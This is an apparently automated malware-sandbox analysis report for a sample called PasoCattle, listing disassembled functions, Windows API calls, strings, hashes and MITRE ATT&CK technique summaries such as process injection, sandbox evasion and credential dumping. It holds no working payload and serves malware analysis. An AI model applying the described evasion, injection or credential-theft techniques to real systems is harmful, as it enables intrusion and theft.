Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759

Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004062A4
lstrcatW.KERNEL32(00000000,...), ref: 004062C7

Strings

%02x%c, xrefs: 0040629C
..., xrefs: 004062BF

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794

Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Section: "%s", xrefs: 004050A5
Skipping section: "%s", xrefs: 004050E1

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,74DF23A0,00000000), ref: 00406902

CreateFontIndirectW.GDI32(00420110), ref: 0040216A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D

Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
lstrcmpW.KERNEL32(?,Version ), ref: 00407276
lstrcpynW.KERNEL32(?,?,?), ref: 0040728D

Strings

Version , xrefs: 0040726D

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC

Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
GlobalFree.KERNEL32(00000000), ref: 004063CA

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674

Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040492E
CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404906

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714

Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
CloseHandle.KERNEL32(?), ref: 00405C9D

Strings

Error launching installer, xrefs: 00405C74

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69

Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062D1, 004062D6

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E

Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

